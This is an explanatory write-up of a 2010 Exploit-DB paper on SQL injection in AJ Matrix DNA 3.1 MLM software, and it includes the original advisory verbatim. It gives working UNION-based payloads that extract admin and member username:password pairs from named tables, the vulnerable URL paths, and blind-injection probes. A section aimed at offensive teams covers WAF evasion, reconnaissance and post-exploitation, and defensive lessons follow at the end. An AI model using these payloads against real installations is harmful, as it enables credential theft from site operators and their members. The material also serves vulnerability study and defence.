AJ Matrix 3.1 'id' SQL Injection: Extracting Credentials

AJ Matrix 3.1 'id' SQL Injection: Extracting Credentials
What this paper is
This paper details a SQL injection vulnerability found in the AJ Matrix DNA software, specifically version 3.1. The vulnerability allows an attacker to extract administrative and member credentials by manipulating the id parameter in specific URL requests. The exploit leverages UNION based SQL injection to retrieve data from database tables.
Simple technical breakdown
The AJ Matrix DNA software, used for Multi-Level Marketing (MLM) and affiliate programs, has a flaw in how it handles user input for an id parameter. When this id parameter is used in certain parts of the application (like viewing product details or news), it's directly inserted into a SQL query without proper sanitization.
An attacker can exploit this by sending a specially crafted id value that includes SQL commands. These commands, using UNION ALL SELECT, allow the attacker to combine the results of their malicious query with the original query's results. The goal is to extract sensitive information like usernames and passwords from database tables named ajmatrix_admin_table and ajmatrix_members_table.
The paper also briefly mentions a "Blind SQLi p0c" which suggests that even if direct output isn't visible, an attacker could infer information by observing the application's behavior (e.g., whether a page loads or shows an error) based on the truthiness of injected SQL conditions.
Complete code and payload walkthrough
The core of the exploit lies in the provided SQL injection payloads. There are no executable code blocks or shellcode in the traditional sense within this paper; it's purely a demonstration of SQL injection techniques.
Here's a breakdown of the provided SQL injection payloads:
Payload 1:
-99999+union+all+select+0,0,group_concat(admin_username,char(58),admin_password)v3n0m,0,0+from+ajmatrix_admin_table---99999: This is likely an attempt to ensure the original query (which expects a validid) fails or returns no results. By providing a value that won't match any existingid, the original query part will yield nothing.+union+all+select+: This is the core of theUNIONbased SQL injection.UNION ALL: This operator combines the result set of twoSELECTstatements.ALLmeans it will include duplicate rows, which is generally preferred in exploitation to ensure all data is captured.SELECT: This initiates the attacker's query.
0,0,: These are placeholder values. In aUNIONattack, the number of columns in the attacker'sSELECTstatement must match the number of columns in the original query. These0s are used to fill columns that the attacker doesn't intend to extract data from, but which are necessary to match the column count. The exact number of these placeholders depends on the original query's structure, which is not fully detailed but implied to be at least 5 columns based on the pattern.group_concat(admin_username,char(58),admin_password): This is the crucial part for data extraction.group_concat(): This SQL function concatenates non-NULL values from a group into a single string. This is useful for retrieving multiple rows of data in a single query result, especially when the database might limit the number of rows returned or when dealing with single-column output.admin_username: This refers to the column containing administrator usernames.char(58): This inserts the ASCII character with decimal value 58, which is a colon (:). This character acts as a delimiter between the username and password, making the output easier to parse.admin_password: This refers to the column containing administrator passwords.
v3n0m: This is a string literal, likely used as a marker or identifier by the attacker within the output. It's placed after the concatenated credentials.,0,0: More placeholder0s to match the required column count for theUNIONoperation.+from+ajmatrix_admin_table: This specifies the table from which the attacker wants to retrieve data.ajmatrix_admin_tableis identified as the table containing administrator credentials.--: This is a SQL comment. It comments out the rest of the original query, preventing syntax errors and ensuring only the attacker's injected query is executed.
Payload 2:
-99999+union+all+select+0,0,group_concat(members_username,char(58),members_password)v3n0m,0,0+from+ajmatrix_members_table--- This payload is identical in structure to Payload 1, with the key difference being the target table.
group_concat(members_username,char(58),members_password): Extracts usernames and passwords.from+ajmatrix_members_table: Specifies the table containing member credentials.
Blind SQLi p0c:
http://127.0.0.1/[path]/?do=productdetail&id=1+AND+SUBSTRING(@@version,1,1)=5 << true
http://127.0.0.1/[path]/?do=productdetail&id=1+AND+SUBSTRING(@@version,1,1)=4 << false1+AND+: This part injects a condition into the original query. The1is likely to ensure the original condition is true (assuming the original query might beWHERE id = 1or similar). TheANDoperator requires both conditions to be true for the overall query to succeed.SUBSTRING(@@version,1,1): This is a SQL function that extracts a substring.@@version: This is a system variable in many SQL databases (like MySQL) that holds the database server's version string.SUBSTRING(..., 1, 1): Extracts the first character (starting from position 1) of the@@versionstring.
=5/=4: This compares the extracted first character of the version string to a specific digit.<< true/<< false: These are not part of the SQL query itself but indicate the expected outcome of the test.- If the first character of the database version is indeed '5' (e.g., MySQL 5.x), the condition
SUBSTRING(@@version,1,1)=5will be true, and the page will load normally (or with expected content). - If the first character is not '5' (e.g., MySQL 4.x), the condition will be false. This might cause the query to return no results, an error, or a different page, allowing the attacker to infer the truthiness of the injected condition. This is the basis of blind SQL injection, where data is exfiltrated character by character by observing the application's response.
- If the first character of the database version is indeed '5' (e.g., MySQL 5.x), the condition
Mapping list:
[SQLi]placeholder inhttp://127.0.0.1/[path]/?do=cms&action=news&id=[SQLi]-> Injection point for UNION-based SQLi payloads.[SQLi]placeholder inhttp://127.0.0.1/[path]/?do=productdetail&id=1+[SQLi]-> Injection point for Blind SQLi payloads.-99999-> Ensures original query fails, making space for UNION results.union+all+select-> Core SQLi technique to combine query results.0,0,...-> Placeholder values to match the original query's column count.group_concat(column1,char(58),column2)-> Extracts multiple rows of data into a single string, delimited by a colon.v3n0m-> Attacker-defined marker in the output.from+table_name-> Specifies the target table for data extraction.---> SQL comment to neutralize the rest of the original query.1+AND+SUBSTRING(@@version,1,1)=X-> Blind SQLi technique to test conditions and infer data based on application response.
Practical details for offensive operations teams
- Required Access Level: No elevated privileges are required beyond the ability to send HTTP requests to the target web application. This is a client-side vulnerability exploitable via the web browser or an automated tool.
- Lab Preconditions:
- A running instance of AJ Matrix DNA v3.1 (or a similarly vulnerable version).
- A configured web server (e.g., Apache, Nginx) with PHP and a compatible database (e.g., MySQL).
- A database populated with
ajmatrix_admin_tableandajmatrix_members_table, containing sample usernames and passwords. - Knowledge of the application's URL structure and the specific paths where the
idparameter is vulnerable (e.g.,/index.php?do=cms&action=news&id=...or/index.php?do=productdetail&id=...).
- Tooling Assumptions:
- Web Browser: For manual testing and verification.
- HTTP Proxy/Interception Tool: Such as Burp Suite or OWASP ZAP, to intercept, modify, and replay HTTP requests. This is essential for crafting and sending the malicious payloads.
- SQL Injection Scanners: Tools like sqlmap can automate the discovery and exploitation of such vulnerabilities. However, manual crafting is often necessary for complex or non-standard SQL dialects.
- Scripting Languages: Python with libraries like
requestscan be used to automate the process of sending payloads and parsing results.
- Execution Pitfalls:
- URL Encoding: Spaces and special characters in the payload must be URL-encoded (e.g., space becomes
%20or+, colon becomes%3A). The provided payloads use+for spaces, which is common in URL query strings. - Column Count Mismatch: The number of
SELECTcolumns in the injected query must match the number of columns in the original query. If the original query has, say, 7 columns, the attacker needs to provide 7 items in theirSELECTlist (e.g.,0,0,payload,0,0,0,0). The paper implies 5 columns. Incorrect column counts will result in SQL syntax errors. - Database Type: The syntax for
group_concatand@@versionis common in MySQL. If the target uses a different database system (e.g., PostgreSQL, SQL Server), the functions and system variables might differ, requiring payload adaptation. - WAF/IDS Evasion: Web Application Firewalls (WAFs) or Intrusion Detection Systems (IDS) might detect common SQL injection patterns. Techniques like character encoding, using different SQL functions, or breaking up payloads might be necessary.
- Output Parsing: The
group_concatoutput will be a single string. The attacker needs to parse this string to separate usernames and passwords based on thechar(58)(colon) delimiter. - Blind SQLi Complexity: Blind SQL injection is significantly slower and more complex to execute. It requires careful observation of application responses and iterative testing.
- URL Encoding: Spaces and special characters in the payload must be URL-encoded (e.g., space becomes
- Tradecraft Considerations:
- Reconnaissance: Identify vulnerable parameters (
id) and application paths. Use Google Dorks (as suggested by the author) or directory brute-forcing to find potential entry points. - Enumeration: Determine the database type and version (if possible, via blind techniques or banner grabbing). Identify table and column names. The paper explicitly names
ajmatrix_admin_tableandajmatrix_members_table, which is a significant head start. - Payload Crafting: Adapt payloads based on discovered database specifics and WAF presence.
- Data Exfiltration: Plan how to extract and store the sensitive credentials. Consider the volume of data and potential for detection.
- Post-Exploitation: Once credentials are obtained, plan for further actions (e.g., logging in, privilege escalation, lateral movement) within the scope of the authorized engagement.
- Reconnaissance: Identify vulnerable parameters (
Where this was used and when
- Software: AJ Matrix DNA, version 3.1.
- Context: This vulnerability was published in April 2010. It targets a commercial MLM software solution.
- Usage: The paper provides Proof-of-Concept (PoC) URLs, suggesting it was demonstrated on local or accessible instances. It's highly probable that this vulnerability, or similar ones in older versions of the software, could have been exploited in the wild by attackers targeting businesses using this MLM platform. The author's location (Jakarta, Indonesia) and shoutouts to various groups suggest a community of security researchers and potentially black-hat actors active around that time.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most fundamental lesson. All user-supplied input, especially parameters used in database queries, must be rigorously validated and sanitized to prevent injection attacks. Use parameterized queries (prepared statements) as the primary defense.
- Least Privilege Principle: Database accounts used by web applications should have only the minimum necessary permissions. Avoid using administrative accounts for regular application operations.
- Web Application Firewalls (WAFs): While not a silver bullet, WAFs can provide a layer of defense against common SQL injection patterns. Keep WAF rules updated.
- Regular Patching and Updates: Keep all software, including web applications and their underlying frameworks/databases, up to date with the latest security patches. The vendor's website is listed, indicating a commercial product that should ideally be maintained.
- Secure Coding Practices: Developers must be trained on secure coding principles to avoid introducing vulnerabilities like SQL injection. Code reviews and static/dynamic analysis tools can help identify such flaws early.
- Error Handling: Configure applications to display generic error messages to users. Detailed database error messages can leak sensitive information about the database structure, version, and data, aiding attackers.
- Database Auditing and Monitoring: Implement logging and monitoring for database access and query execution. Unusual query patterns or access attempts can be indicators of an attack.
- Separation of Concerns: If possible, separate sensitive data tables from those used for general application functionality.
ASCII visual (if applicable)
This vulnerability is a direct manipulation of HTTP requests and SQL queries. A visual representation of the flow would be:
+-----------------+ +-----------------+ +-----------------+ +-----------------+
| Attacker's Input| ---> | Web Application | ---> | Database Query | ---> | Database Server |
| (Malicious URL) | | (AJ Matrix DNA) | | (Injected SQL) | | |
+-----------------+ +-----------------+ +-----------------+ +-----------------+
| |
| (Exploits 'id' parameter) | (Returns Data)
| |
v v
+-----------------+ +-----------------+ +-----------------+ +-----------------+
| Malicious Payload| ---> | Vulnerable | ---> | UNION ALL SELECT| ---> | Extracted |
| (e.g., UNION ALL | | 'id' parameter | | (e.g., admin | | Credentials |
| SELECT ...) | | processing | | username/pass) | | (username:pass) |
+-----------------+ +-----------------+ +-----------------+ +-----------------+Source references
- PAPER ID: 12346
- PAPER TITLE: AJ Matrix 3.1 - 'id' Multiple SQL Injections
- AUTHOR: v3n0m
- PUBLISHED: 2010-04-22
- PAPER URL: https://www.exploit-db.com/papers/12346
- RAW URL: https://www.exploit-db.com/raw/12346
Original Exploit-DB Content (Verbatim)
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
.WEB.ID
-----------------------------------------------------------------------
AJ Matrix v3.1 (id) Multiple SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : April, 23-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : AJ Matrix DNA
Vendor : http://www.ajsquare.com/
Price : $2499.00 USD
Version : 3.1 Other versions may also be affected
Google Dork : Use your brain & imagination :)
AJ Matrix DNA is the world's leading MLM software solution for all MLM and affiliate programs.
Offering the quality software packages at a fraction of the cost. Our Matrix DNA Software is
the right solution for any sized business.
----------------------------------------------------------------
Exploit:
~~~~~~~
-99999+union+all+select+0,0,group_concat(admin_username,char(58),admin_password)v3n0m,0,0+from+ajmatrix_admin_table--
-99999+union+all+select+0,0,group_concat(members_username,char(58),members_password)v3n0m,0,0+from+ajmatrix_members_table--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/?do=cms&action=news&id=[SQLi]
Blind SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/?do=productdetail&id=1+AND+SUBSTRING(@@version,1,1)=5 << true
http://127.0.0.1/[path]/?do=productdetail&id=1+AND+SUBSTRING(@@version,1,1)=4 << false
----------------------------------------------------------------
Shoutz:
~~~~
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR [gw suka martabak keju ur...],mywisdom,yadoy666,udhit
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- elicha cristia [Mizz You...Mizz You...Mizz You... :)]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
http://elich4.blogspot.com/ << Update donk >_<
---------------------------[EOF]--------------------------------